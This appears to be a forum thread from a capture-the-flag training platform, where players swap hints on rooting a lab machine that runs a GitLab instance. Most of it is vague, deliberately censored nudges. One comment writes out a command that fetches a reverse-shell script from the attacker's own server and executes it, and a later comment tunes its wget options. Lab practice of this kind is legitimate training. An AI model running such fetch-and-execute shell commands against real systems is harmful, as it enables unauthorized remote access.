Official Laboratory Discussion

Hnmm I leaked the secret, but I can’t get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested but still no luck. Any tips?

Stuck on the foothold. I’ve found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but haven’t found a way to turn this into anything yet. Searched for CVEs but haven’t found any that are useful. As usual I may have missed something obvious?

Rooted :wink:

That was an easy box?
I don’t think so…
Thanks, @n3ph0s for the nudge on foothold.

Feel free to PM if any help is needed.

guys im stuck in the beginning can someone dm me a hint to start with, i did a service scan and i can’t get anywhere around the website

Rooted!

why am i so distracted and overlook things???
Contrary to everyone, the user was easier than the root !

Might be luck but, things just went the right path (even not using docker prior to this)…

foot:

  • look carefully (enumeration)
  • Some things (do… cof… mains) are just a pot full of honey…
  • find the version and build piece by piece with that (find that POC)
  • When exploiting, if the payload fails, check what was said about the “=” symbols (i did not had that issue tho)
  • remember what was, also, said, the machine might not have the bins you want/need

user:

  • It was already mentioned (if you cant crack/find, just hammer the guts and reset the machine!)

root:

  • Enum (latest) might help you over Peas on this one
  • when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

If nudges needed, honk the horn on pm

Thought I’d have a nice little time on this box, but it seems to be 502’ing everything for me after stops/starts/resets :frowning:

Edit: I had to change servers for it to work.

Actually got a shell but no idea about how to find the user flag.

Please send me some nudges.

I’ve reached the gi**ab page, registered an account, discovered the L_I, but can’t undestand how to get R_E, i’ve read about ss*f but it says import url is blocked, am i on the right path? i’m blocked …

Spoiler Removed

This box made me sweat, there are still some mysteries that I have not solved, why some payload works for one person is not the other …

I spent a lot of time setting up the env

it is not an easy box for me

if you need help PM

Yikes, this is not an easy box for me.

I thought I had some plain ruby working for generating the payload, but it’s just not accepted. The ‘other’ more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: If you get a “Something went wrong” error, try a different bin

What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems

this approach got me good: wget “yourserver/rev.sh” && chmod +x rev.sh && ./rev.sh

trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)

Having zero luck getting the payload to hit a local web server. This one has bested me.

Type your comment> @trcm said:

Having zero luck getting the payload to hit a local web server. This one has bested me.

how you generating it??

I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.

Ahha, progress. I had to add “–timeout=3 --tries=1” as wget wasn’t reaching my web service and was executing in place on the rails console borking the erb instance it seems.

rooted. the hardest part was finding the foothold. thanks @siurana for the nudge. after finding an article with the right path, the rest was straightforward. thanks @0xc45 for a fun box!

alright i think i know the vulnerability but can someone help me with how to exploit it

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?